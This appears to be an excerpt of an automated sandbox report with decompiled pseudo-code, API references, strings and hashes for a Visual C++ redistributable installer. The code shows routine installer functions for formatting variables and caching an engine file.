                                                                          										_t249 = 0x8007000e;
                                                                          										_a8 = 0x8007000e;
                                                                          										E000B37D3(_t180, "variable.cpp", 0x4b6, 0x8007000e);
                                                                          										_push("Failed to allocate variable array.");
                                                                          										L37:
                                                                          										_push(_t243);
                                                                          										goto L8;
                                                                          									}
                                                                          									L17:
                                                                          									if(_v20 < 2) {
                                                                          										L20:
                                                                          										if(_a20 == 0) {
                                                                          											L22:
                                                                          											_t215 = _v8;
                                                                          											if(_v36 == 0) {
                                                                          												_t245 = _t244 + _t215 * 4;
                                                                          												_t182 = E000B7203(_t219, _a4, _v12, _t244 + _t215 * 4); // executed
                                                                          												_t249 = _t182;
                                                                          												_a8 = _t249;
                                                                          												if(_t249 != 0x80070490) {
                                                                          													L27:
                                                                          													_t246 = _v28;
                                                                          													L28:
                                                                          													if(_t249 < 0) {
                                                                          														_push("Failed to set variable value.");
                                                                          														goto L2;
                                                                          													}
                                                                          													_t215 = _t215 + 1;
                                                                          													_v8 = _t215;
                                                                          													_t249 = E000B8260(_t246,  &_v12, L"[%d]", _t215);
                                                                          													_t265 = _t265 + 0x10;
                                                                          													_a8 = _t249;
                                                                          													if(_t249 < 0) {
                                                                          														_push("Failed to format placeholder string.");
                                                                          														goto L2;
                                                                          													}
                                                                          													_t249 = E000B823E(_t246,  &_v16, _v12, 0);
                                                                          													_a8 = _t249;
                                                                          													if(_t249 < 0) {
                                                                          														_push("Failed to append placeholder.");
                                                                          														goto L2;
                                                                          													}
                                                                          													L31:
                                                                          													_t238 = _v40 + 2;
                                                                          													continue;
                                                                          												}
                                                                          												_t190 = E000B22F9(_t245, 0xfb524, 0);
                                                                          												L26:
                                                                          												_t249 = _t190;
                                                                          												_a8 = _t249;
                                                                          												goto L27;
                                                                          											}
                                                                          											_t190 = E000B21A5(_t244 + _t215 * 4, L"*****", 0);
                                                                          											goto L26;
                                                                          										}
                                                                          										_t249 = E000B7E13(_t219, _a4, _v12,  &_v36);
                                                                          										_a8 = _t249;
                                                                          										if(_t249 < 0) {
                                                                          											E000F012F(_t249, "Failed to determine variable visibility: \'%ls\'.", _v12);
                                                                          											goto L66;
                                                                          										}
                                                                          										goto L22;
                                                                          									}
                                                                          									_t219 = 0x5c;
                                                                          									if(_t219 !=  *((intOrPtr*)(_t216 + 2))) {
                                                                          										goto L20;
                                                                          									}
                                                                          									_t41 = _t216 + 4; // 0x4
                                                                          									_t215 = _v8;
                                                                          									_t246 = _v28;
                                                                          									_t249 = E000B8281(_v28, _t244 + _t215 * 4, _t41, 1);
                                                                          									_a8 = _t249;
                                                                          									goto L28;
                                                                          								}
                                                                          								_push(_t219);
                                                                          								_t199 = E000B3A72();
                                                                          								if(_t199 == 0) {
                                                                          									_t243 = 0x8007000e;
                                                                          									_t249 = 0x8007000e;
                                                                          									_a8 = 0x8007000e;
                                                                          									E000B37D3(_t199, "variable.cpp", 0x4b0, 0x8007000e);
                                                                          									_push("Failed to reallocate variable array.");
                                                                          									goto L37;
                                                                          								}
                                                                          								_t244 = _t199;
                                                                          								_v24 = _t244;
                                                                          								goto L17;
                                                                          							}
                                                                          							_t249 = E000B823E(0 | _a20 == 0x00000000,  &_v16, _t238, _t216 - _t238 >> 1);
                                                                          							_a8 = _t249;
                                                                          							if(_t249 < 0) {
                                                                          								L6:
                                                                          								_push("Failed to append string.");
                                                                          								goto L7;
                                                                          							} else {
                                                                          								_t219 = _v20;
                                                                          								goto L12;
                                                                          							}
                                                                          						}
                                                                          						_t249 = E000B823E(0 | _a20 == 0x00000000,  &_v16, _t238, (_t138 - _t238 >> 1) + 1);
                                                                          						_a8 = _t249;
                                                                          						if(_t249 >= 0) {
                                                                          							goto L31;
                                                                          						}
                                                                          						goto L6;
                                                                          					}
                                                                          					_t218 = 0 | _a20 == 0x00000000;
                                                                          					_t141 = E000B823E(_a20 == 0,  &_v16, _t238, 0);
                                                                          					_t249 = _t141;
                                                                          					_a8 = _t249;
                                                                          					if(_t249 < 0) {
                                                                          						goto L6;
                                                                          					}
                                                                          					_push(_v8);
                                                                          					L000EF3D0(); // executed
                                                                          					_t240 = _t141;
                                                                          					_v32 = _t240;
                                                                          					if(_t240 != 0) {
                                                                          						_push(_v16);
                                                                          						_push(0);
                                                                          						_push(_t240);
                                                                          						L000EF3E0();
                                                                          						if(0 == 0) {
                                                                          							_t227 = 0;
                                                                          							_t241 = 0;
                                                                          							if(_v8 <= 0) {
                                                                          								L53:
                                                                          								_t242 = _v32;
                                                                          								_t156 =  &_v20;
                                                                          								_push(_t156);
                                                                          								_push(0xfb524);
                                                                          								_push(_t242);
                                                                          								_push(_t227);
                                                                          								_v20 = _t227;
                                                                          								L000EF3F0();
                                                                          								if(_t156 == 0xea || _t156 == 0) {
                                                                          									if(_a12 == 0) {
                                                                          										L64:
                                                                          										_t228 = _a16;
                                                                          										if(_t228 != 0) {
                                                                          											 *_t228 = _v20;
                                                                          										}
                                                                          										goto L66;
                                                                          									}
                                                                          									_v20 = _v20 + 1;
                                                                          									_t249 = E000B821F(_t218,  &_v12, _v20 + 1);
                                                                          									_a8 = _t249;
                                                                          									if(_t249 >= 0) {
                                                                          										_t162 =  &_v20;
                                                                          										_push(_t162);
                                                                          										_push(_v12);
                                                                          										_push(_t242);
                                                                          										_push(0);
                                                                          										L000EF3F0();
                                                                          										if(_t162 == 0) {
                                                                          											_t249 = E000B8281(_t218, _a12, _v12, 0);
                                                                          											_a8 = _t249;
                                                                          											if(_t249 >= 0) {
                                                                          												goto L64;
                                                                          											}
                                                                          											_push("Failed to copy string.");
                                                                          											goto L7;
                                                                          										}
                                                                          										_t254 =  <=  ? _t162 : _t162 & 0x0000ffff | 0x80070000;
                                                                          										_t249 =  >=  ? 0x80004005 :  <=  ? _t162 : _t162 & 0x0000ffff | 0x80070000;
                                                                          										_a8 = _t249;
                                                                          										E000B37D3(0x80004005, "variable.cpp", 0x508, _t249);
                                                                          										_push("Failed to format record.");
                                                                          										goto L7;
                                                                          									}
                                                                          									_push("Failed to allocate string.");
                                                                          								} else {
                                                                          									_t257 =  <=  ? _t156 : _t156 & 0x0000ffff | 0x80070000;
                                                                          									_t249 =  >=  ? 0x80004005 :  <=  ? _t156 : _t156 & 0x0000ffff | 0x80070000;
                                                                          									_a8 = _t249;
                                                                          									E000B37D3(0x80004005, "variable.cpp", 0x4fe, _t249);
                                                                          									_push("Failed to get formatted length.");
                                                                          								}
                                                                          								goto L7;
                                                                          							}
                                                                          							_t168 = _v24;
                                                                          							_t229 = _v8;
                                                                          							do {
                                                                          								_t237 =  *((intOrPtr*)(_t168 + _t241 * 4));
                                                                          								_t249 = _a8;
                                                                          								if( *_t237 == 0) {
                                                                          									goto L51;
                                                                          								}
                                                                          								_push(_t237);
                                                                          								_t89 = _t241 + 1; // 0x1
                                                                          								_t169 = _t89;
                                                                          								_push(_t169);
                                                                          								_push(_v32);
                                                                          								L000EF3E0();
                                                                          								if(_t169 != 0) {
                                                                          									_t261 =  <=  ? _t169 : _t169 & 0x0000ffff | 0x80070000;
                                                                          									_t249 =  >=  ? 0x80004005 :  <=  ? _t169 : _t169 & 0x0000ffff | 0x80070000;
                                                                          									_a8 = _t249;
                                                                          									E000B37D3(0x80004005, "variable.cpp", 0x4f2, _t249);
                                                                          									_push("Failed to set record string.");
                                                                          									goto L7;
                                                                          								}
                                                                          								_t168 = _v24;
                                                                          								_t229 = _v8;
                                                                          								L51:
                                                                          								_t241 = _t241 + 1;
                                                                          							} while (_t241 < _t229);
                                                                          							_t227 = 0;
                                                                          							goto L53;
                                                                          						}
                                                                          						_t264 =  <=  ? 0 : 0xffffffff80070000;
                                                                          						_t249 =  >=  ? 0x80004005 :  <=  ? 0 : 0xffffffff80070000;
                                                                          						_a8 = _t249;
                                                                          						E000B37D3(0x80004005, "variable.cpp", 0x4ea, _t249);
                                                                          						_push("Failed to set record format string.");
                                                                          						goto L7;
                                                                          					}
                                                                          					_t243 = 0x8007000e;
                                                                          					_t249 = 0x8007000e;
                                                                          					_a8 = 0x8007000e;
                                                                          					E000B37D3(_t141, "variable.cpp", 0x4e6, 0x8007000e);
                                                                          					_push("Failed to allocate record.");
                                                                          					goto L37;
                                                                          				} else {
                                                                          					_push("Failed to allocate buffer for format string.");
                                                                          					L2:
                                                                          					_push(_t249);
                                                                          					E000F012F();
                                                                          					L67:
                                                                          					LeaveCriticalSection(_a4);
                                                                          					_t143 = _v24;
                                                                          					if(_t143 == 0) {
                                                                          						L77:
                                                                          						_t144 = _v32;
                                                                          						if(_t144 != 0) {
                                                                          							_push(_t144); // executed
                                                                          							L000EF3C0(); // executed
                                                                          						}
                                                                          						if(_a20 == 0) {
                                                                          							E000B2793(0);
                                                                          							E000B2793(_v16);
                                                                          							E000B2793(_v12);
                                                                          						} else {
                                                                          							if(_v16 != 0) {
                                                                          								E000F54EF(_v16);
                                                                          							}
                                                                          							if(_v12 != 0) {
                                                                          								E000F54EF(_v12);
                                                                          							}
                                                                          						}
                                                                          						return _t249;
                                                                          					}
                                                                          					_t239 = 0;
                                                                          					if(_t215 == 0) {
                                                                          						L76:
                                                                          						E000B3999(_t143);
                                                                          						goto L77;
                                                                          					}
                                                                          					_t250 = _t143;
                                                                          					do {
                                                                          						if(_a20 == 0) {
                                                                          							E000B2793( *((intOrPtr*)(_t250 + _t239 * 4)));
                                                                          						} else {
                                                                          							if( *((intOrPtr*)(_t250 + _t239 * 4)) != 0) {
                                                                          								E000F54EF( *((intOrPtr*)(_t250 + _t239 * 4)));
                                                                          							}
                                                                          						}
                                                                          						_t239 = _t239 + 1;
                                                                          					} while (_t239 < _t215);
                                                                          					_t249 = _a8;
                                                                          					_t143 = _v24;
                                                                          					goto L76;
                                                                          				}
                                                                          			}










































                                                                          0x000b5b3a
                                                                          0x00000000
                                                                          0x000b5b3a
                                                                          0x000b5afa
                                                                          0x000b5b04
                                                                          0x000b5b12
                                                                          0x000b5b15
                                                                          0x000b5b1a
                                                                          0x00000000
                                                                          0x000b5b1a
                                                                          0x000b5ad1
                                                                          0x000b5a42
                                                                          0x000b5a4d
                                                                          0x000b5a57
                                                                          0x000b5a65
                                                                          0x000b5a68
                                                                          0x000b5a6d
                                                                          0x000b5a6d
                                                                          0x00000000
                                                                          0x000b5a3c
                                                                          0x000b59f0
                                                                          0x000b59f3
                                                                          0x000b59f6
                                                                          0x000b59f6
                                                                          0x000b59fe
                                                                          0x000b5a01
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b5a03
                                                                          0x000b5a04
                                                                          0x000b5a04
                                                                          0x000b5a07
                                                                          0x000b5a08
                                                                          0x000b5a0b
                                                                          0x000b5a12
                                                                          0x000b5a82
                                                                          0x000b5a8c
                                                                          0x000b5a9a
                                                                          0x000b5a9d
                                                                          0x000b5aa2
                                                                          0x00000000
                                                                          0x000b5aa2
                                                                          0x000b5a14
                                                                          0x000b5a17
                                                                          0x000b5a1a
                                                                          0x000b5a1a
                                                                          0x000b5a1b
                                                                          0x000b5a1f
                                                                          0x00000000
                                                                          0x000b5a1f
                                                                          0x000b59bd
                                                                          0x000b59c7
                                                                          0x000b59d5
                                                                          0x000b59d8
                                                                          0x000b59dd
                                                                          0x00000000
                                                                          0x000b59dd
                                                                          0x000b58fd
                                                                          0x000b5908
                                                                          0x000b590f
                                                                          0x000b5912
                                                                          0x000b5917
                                                                          0x00000000
                                                                          0x000b56ca
                                                                          0x000b56ca
                                                                          0x000b56cf
                                                                          0x000b56cf
                                                                          0x000b56d0
                                                                          0x000b5b53
                                                                          0x000b5b56
                                                                          0x000b5b5c
                                                                          0x000b5b61
                                                                          0x000b5b9c
                                                                          0x000b5b9c
                                                                          0x000b5ba1
                                                                          0x000b5ba3
                                                                          0x000b5ba4
                                                                          0x000b5ba4
                                                                          0x000b5bad
                                                                          0x000b5bd0
                                                                          0x000b5bd8
                                                                          0x000b5be0
                                                                          0x000b5baf
                                                                          0x000b5bb3
                                                                          0x000b5bb8
                                                                          0x000b5bb8
                                                                          0x000b5bc1
                                                                          0x000b5bc6
                                                                          0x000b5bc6
                                                                          0x000b5bc1
                                                                          0x000b5bed
                                                                          0x000b5bed
                                                                          0x000b5b65
                                                                          0x000b5b69
                                                                          0x000b5b96
                                                                          0x000b5b97
                                                                          0x00000000
                                                                          0x000b5b97
                                                                          0x000b5b6b
                                                                          0x000b5b6d
                                                                          0x000b5b71
                                                                          0x000b5b86
                                                                          0x000b5b73
                                                                          0x000b5b77
                                                                          0x000b5b7c
                                                                          0x000b5b7c
                                                                          0x000b5b77
                                                                          0x000b5b8b
                                                                          0x000b5b8c
                                                                          0x000b5b90
                                                                          0x000b5b93
                                                                          0x00000000
                                                                          0x000b5b93

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(000002C0,00000100,00000100,00000000,00000000,?,000B99BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 000B56A2
                                                                          • lstrlenW.KERNEL32(00000000,?,000B99BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 000B56AC
                                                                          • _wcschr.LIBVCRUNTIME ref: 000B58B4
                                                                          • LeaveCriticalSection.KERNEL32(000002C0,00000000,00000000,00000000,00000000,00000000,00000001,?,000B99BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0), ref: 000B5B56
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave_wcschrlstrlen
                                                                          • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
                                                                          • API String ID: 1026845265-2050445661
                                                                          • Opcode ID: 6554ec4d894fe2a1a7ad45fb9961a37a42d0dd4c9e768494d04cc096c2e4c0de
                                                                          • Instruction ID: 3c65b982ea1f733e275f2d8777fa1260d63bd2d720d8dc9b499e0275568d9994
                                                                          • Opcode Fuzzy Hash: 6554ec4d894fe2a1a7ad45fb9961a37a42d0dd4c9e768494d04cc096c2e4c0de
                                                                          • Instruction Fuzzy Hash: 0FF1B072E00619ABDB219FA48C41FFF7BA9EF44751F10416ABE05BB241DB349E01DBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 935 c84c4-c8512 CreateFileW 936 c8558-c8568 call f47d3 935->936 937 c8514-c8553 call b37d3 call f012f 935->937 942 c856a-c857b call f012f 936->942 943 c8580-c858b call f3db5 936->943 956 c86fc-c870e call dde36 937->956 950 c86f5-c86f6 FindCloseChangeNotification 942->950 948 c8590-c8594 943->948 951 c85af-c85b4 948->951 952 c8596-c85aa call f012f 948->952 950->956 951->950 955 c85ba-c85c9 SetFilePointerEx 951->955 952->950 958 c85cb-c85fe call b37d3 955->958 959 c8603-c8613 call f4cee 955->959 968 c86ed-c86f4 call f012f 958->968 965 c861f-c8630 SetFilePointerEx 959->965 966 c8615-c861a 959->966 969 c866a-c867a call f4cee 965->969 970 c8632-c8665 call b37d3 965->970 966->968 968->950 969->966 978 c867c-c868c call f4cee 969->978 970->968 978->966 982 c868e-c869f SetFilePointerEx 978->982 983 c86d6-c86e6 call f4cee 982->983 984 c86a1-c86d4 call b37d3 982->984 983->950 989 c86e8 983->989 984->968 989->968
                                                                          C-Code - Quality: 71%
                                                                          			E000C84C4(void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
                                                                          				signed int _v8;
                                                                          				char _v20;
                                                                          				WCHAR* _v24;
                                                                          				intOrPtr _v28;
                                                                          				intOrPtr _v32;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t25;
                                                                          				void* _t29;
                                                                          				void* _t31;
                                                                          				void* _t33;
                                                                          				signed short _t51;
                                                                          				signed short _t54;
                                                                          				signed short _t57;
                                                                          				signed short _t62;
                                                                          				intOrPtr _t66;
                                                                          				WCHAR* _t67;
                                                                          				void* _t73;
                                                                          				void* _t75;
                                                                          				signed int _t91;
                                                                          
                                                                          				_t73 = __edx;
                                                                          				_t25 =  *0x11a008; // 0xf77c1860
                                                                          				_v8 = _t25 ^ _t91;
                                                                          				_t67 = _a12;
                                                                          				_t66 = _a16;
                                                                          				_t76 = _a4;
                                                                          				_v28 = _a8;
                                                                          				_v32 = _a4;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_v24 = _t67;
                                                                          				asm("stosd"); // executed
                                                                          				_t29 = CreateFileW(_t67, 0x40000000, 5, 0, 2, 0x8000080, 0); // executed
                                                                          				_t75 = _t29;
                                                                          				if(_t75 != 0xffffffff) {
                                                                          					_t31 = E000F47D3(_t67, _t76, 0, 0, 0, 0); // executed
                                                                          					_t77 = _t31;
                                                                          					if(_t31 >= 0) {
                                                                          						_t33 = E000F3DB5(_t73, _v32, _t75,  *((intOrPtr*)(_t66 + 0xc)), 0, 0); // executed
                                                                          						_t77 = _t33;
                                                                          						if(_t77 >= 0) {
                                                                          							if( *((intOrPtr*)(_t66 + 0x28)) != 0) {
                                                                          								_push(0);
                                                                          								if(SetFilePointerEx(_t75,  *(_t66 + 0x18), 0, 0) != 0) {
                                                                          									if(E000F4CEE(0, _t75, _t66 + 0x24, 4) >= 0) {
                                                                          										_push(0);
                                                                          										if(SetFilePointerEx(_t75,  *(_t66 + 0x1c), 0, 0) != 0) {
                                                                          											_t77 = E000F4CEE(0, _t75, _t66 + 0x28, 4);
                                                                          											if(_t77 < 0) {
                                                                          												goto L10;
                                                                          											} else {
                                                                          												_t77 = E000F4CEE(0, _t75, _t66 + 0x2c, 4);
                                                                          												if(_t77 < 0) {
                                                                          													goto L10;
                                                                          												} else {
                                                                          													_push(0);
                                                                          													if(SetFilePointerEx(_t75,  *(_t66 + 0x20), 0, 0) != 0) {
                                                                          														_t77 = E000F4CEE(0, _t75,  &_v20, 0xc);
                                                                          														if(_t77 < 0) {
                                                                          															_push("Failed to zero out original data offset.");
                                                                          															goto L19;
                                                                          														}
                                                                          													} else {
                                                                          														_t51 = GetLastError();
                                                                          														_t81 =  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
                                                                          														_t77 =  >=  ? 0x80004005 :  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
                                                                          														E000B37D3(0x80004005, "cache.cpp", 0x6d6, _t77);
                                                                          														_push("Failed to seek to original data in exe burn section header.");
                                                                          														goto L19;
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										} else {
                                                                          											_t54 = GetLastError();
                                                                          											_t84 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                          											_t77 =  >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                          											E000B37D3(0x80004005, "cache.cpp", 0x6c9, _t77);
                                                                          											_push("Failed to seek to signature table in exe header.");
                                                                          											goto L19;
                                                                          										}
                                                                          									} else {
                                                                          										L10:
                                                                          										_push("Failed to update signature offset.");
                                                                          										goto L19;
                                                                          									}
                                                                          								} else {
                                                                          									_t57 = GetLastError();
                                                                          									_t87 =  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
                                                                          									_t77 =  >=  ? 0x80004005 :  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
                                                                          									E000B37D3(0x80004005, "cache.cpp", 0x6bf, _t77);
                                                                          									_push("Failed to seek to checksum in exe header.");
                                                                          									L19:
                                                                          									_push(_t77);
                                                                          									E000F012F();
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_push(_v24);
                                                                          							E000F012F(_t77, "Failed to copy engine from: %ls to: %ls", _v28);
                                                                          						}
                                                                          					} else {
                                                                          						E000F012F(_t77, "Failed to seek to beginning of engine file: %ls", _v28);
                                                                          					}
                                                                          					FindCloseChangeNotification(_t75); // executed
                                                                          				} else {
                                                                          					_t62 = GetLastError();
                                                                          					_t90 =  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
                                                                          					_t77 =  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
                                                                          					E000B37D3(0x80004005, "cache.cpp", 0x6af,  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000);
                                                                          					E000F012F( >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000, "Failed to create engine file at path: %ls", _v24);
                                                                          				}
                                                                          				return E000DDE36(_t66, _v8 ^ _t91, _t73, _t75, _t77);
                                                                          			}

























                                                                          0x000c8632
                                                                          0x000c8632
                                                                          0x000c8643
                                                                          0x000c864d
                                                                          0x000c865b
                                                                          0x000c8660
                                                                          0x00000000
                                                                          0x000c8660
                                                                          0x000c8615
                                                                          0x000c8615
                                                                          0x000c8615
                                                                          0x00000000
                                                                          0x000c8615
                                                                          0x000c85cb
                                                                          0x000c85cb
                                                                          0x000c85dc
                                                                          0x000c85e6
                                                                          0x000c85f4
                                                                          0x000c85f9
                                                                          0x000c86ed
                                                                          0x000c86ed
                                                                          0x000c86ee
                                                                          0x000c86f4
                                                                          0x000c85c9
                                                                          0x000c8596
                                                                          0x000c8596
                                                                          0x000c85a2
                                                                          0x000c85a7
                                                                          0x000c856a
                                                                          0x000c8573
                                                                          0x000c8578
                                                                          0x000c86f6
                                                                          0x000c8514
                                                                          0x000c8514
                                                                          0x000c8525
                                                                          0x000c852f
                                                                          0x000c853d
                                                                          0x000c854b
                                                                          0x000c8550
                                                                          0x000c870e

                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,000B4CB6,?,?,00000000,000B4CB6,00000000), ref: 000C8507
                                                                          • GetLastError.KERNEL32 ref: 000C8514
                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,000FB4F0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C86F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeCloseCreateErrorFileFindLastNotification
                                                                          • String ID: @Met$Failed to copy user from: %ls to: %ls$Failed to create user file at path: %ls$Failed to seek to beginning of user file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
                                                                          • API String ID: 4091947256-324234727
                                                                          • Opcode ID: 5a3547fba41793421778ca9c1fe464db083d633650d052a3a788bcd1afd7668a
                                                                          • Instruction ID: f4a8ff6df1e2c06b7bef65a90a85a10a40d25bae924594425062e219d2ec0b01
                                                                          • Opcode Fuzzy Hash: 5a3547fba41793421778ca9c1fe464db083d633650d052a3a788bcd1afd7668a
                                                                          • Instruction Fuzzy Hash: 8551C5B2E402257BF7216B688C49FBF7698EF04750F014129FE00E71C1EBA49C0097E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 83%
                                                                          			E000C7337(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				char _v24;
                                                                          				char _v28;
                                                                          				char _v32;
                                                                          				char _v36;
                                                                          				char _v124;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* _t70;
                                                                          				intOrPtr _t73;
                                                                          				intOrPtr _t76;
                                                                          				intOrPtr _t81;
                                                                          				intOrPtr _t96;
                                                                          				intOrPtr _t105;
                                                                          				intOrPtr _t106;
                                                                          				intOrPtr* _t107;
                                                                          				intOrPtr _t109;
                                                                          				intOrPtr _t110;
                                                                          				intOrPtr _t112;
                                                                          				void* _t140;
                                                                          				void* _t141;
                                                                          				intOrPtr _t142;
                                                                          				intOrPtr _t149;
                                                                          				intOrPtr _t152;
                                                                          
                                                                          				_t140 = __edx;
                                                                          				_v12 = 0;
                                                                          				_v28 = 0;
                                                                          				_v20 = 0;
                                                                          				_v32 = 0;
                                                                          				E000DF670(_t141,  &_v124, 0, 0x58);
                                                                          				_t142 = _a4;
                                                                          				_v36 = 0;
                                                                          				_v8 = 0;
                                                                          				_v16 = 0;
                                                                          				_v24 = 0;
                                                                          				_t11 = _t142 + 0x88; // 0xb533d
                                                                          				_t135 = _t11;
                                                                          				_t70 = E000B7503(_t11); // executed
                                                                          				if(_t70 >= 0) {
                                                                          					_t13 = _t142 + 0x48; // 0xb52fd
                                                                          					_t73 = E000BC2A1(_t13,  &_v124); // executed
                                                                          					__eflags = _t73;
                                                                          					if(_t73 >= 0) {
                                                                          						_t76 = E000BC108( &_v124,  &_v28);
                                                                          						__eflags = _t76;
                                                                          						if(_t76 >= 0) {
                                                                          							__eflags = E000BC362( &_v124,  &_v20,  &_v32);
                                                                          							if(__eflags >= 0) {
                                                                          								_t81 = E000DBDC9(__eflags, _v20, _v32, _t142); // executed
                                                                          								__eflags = _t81;
                                                                          								if(_t81 >= 0) {
                                                                          									_t22 = _t142 + 0x1c0; // 0xb5475
                                                                          									_t23 = _t142 + 0x4d8; // 0xb578d
                                                                          									_t24 = _t142 + 0x140; // 0xb53f5
                                                                          									_t25 = _t142 + 0x400; // 0xb56b5
                                                                          									_t26 = _t142 + 0x3fc; // 0xb56b1
                                                                          									_t27 = _t142 + 0x4d4; // 0xb5789
                                                                          									_t30 = _t142 + 0x3ec; // 0xb56a1
                                                                          									_t31 = _t142 + 0x494; // 0xb5749
                                                                          									_t32 = _t142 + 0x490; // 0xb5745
                                                                          									_t136 = _t32;
                                                                          									_t33 = _t142 + 0x4b8; // 0xb576d
                                                                          									_t34 = _t142 + 0x4a0; // 0xb5755
                                                                          									_t35 = _t142 + 0x1c; // 0xb52d1
                                                                          									_t36 = _t142 + 0x4e0; // 0x485
                                                                          									_t37 = _t142 + 0x4dc; // 0x48d016a
                                                                          									_t96 = E000C5A35( *_t37,  *_t36, _t35, _t34, _t33, _t135, _t32, _t31, _t30,  &_v8,  &_v24, _t27, _t26, _t25, _t24, _t23, _t22,  &_v12);
                                                                          									__eflags = _t96;
                                                                          									if(_t96 >= 0) {
                                                                          										__eflags = _v12;
                                                                          										_t98 =  !=  ? _v12 : 0xfb524;
                                                                          										E000B550F(2, 0x20000009,  !=  ? _v12 : 0xfb524); // executed
                                                                          										E000F076C(GetCurrentProcess(),  &_v36); // executed
                                                                          										asm("cdq");
                                                                          										_t149 = E000B8152(_t135, L"WixBundleElevated", _v36, _t140, 1);
                                                                          										__eflags = _t149;
                                                                          										if(_t149 >= 0) {
                                                                          											_t105 = _v8;
                                                                          											__eflags = _t105;
                                                                          											if(_t105 == 0) {
                                                                          												L21:
                                                                          												_t106 = _v24;
                                                                          												__eflags = _t106;
                                                                          												if(_t106 == 0) {
                                                                          													L24:
                                                                          													_t47 = _t142 + 0x490; // 0xb5745
                                                                          													_t107 = _t47;
                                                                          													__eflags =  *_t107;
                                                                          													if( *_t107 == 0) {
                                                                          														L27:
                                                                          														_t49 = _t142 + 0x100; // 0xb53b5
                                                                          														_t109 = E000CA307(_t135, _t49, _t135, _v8);
                                                                          														__eflags = _t109;
                                                                          														if(_t109 >= 0) {
                                                                          															_t50 = _t142 + 0x490; // 0xb5745
                                                                          															_t107 = _t50;
                                                                          															goto L30;
                                                                          														} else {
                                                                          															_push("Failed to initialize internal cache functionality.");
                                                                          															goto L38;
                                                                          														}
                                                                          													} else {
                                                                          														__eflags =  *_t107 - 1;
                                                                          														if( *_t107 == 1) {
                                                                          															goto L27;
                                                                          														} else {
                                                                          															__eflags =  *_t107 - 3;
                                                                          															if( *_t107 != 3) {
                                                                          																L30:
                                                                          																__eflags =  *_t107 - 1;
                                                                          																if(__eflags == 0) {
                                                                          																	L32:
                                                                          																	_t51 = _t142 + 0xcc; // 0xb5381
                                                                          																	_t135 = _t51;
                                                                          																	_t52 = _t142 + 0x110; // 0xfff9e89d, executed
                                                                          																	_t110 = E000BD497(_t136, _t140, _t142, __eflags,  *_t52, _t51); // executed
                                                                          																	__eflags = _t110;
                                                                          																	if(_t110 >= 0) {
                                                                          																		_t54 = _t142 + 0xbc; // 0xb5371
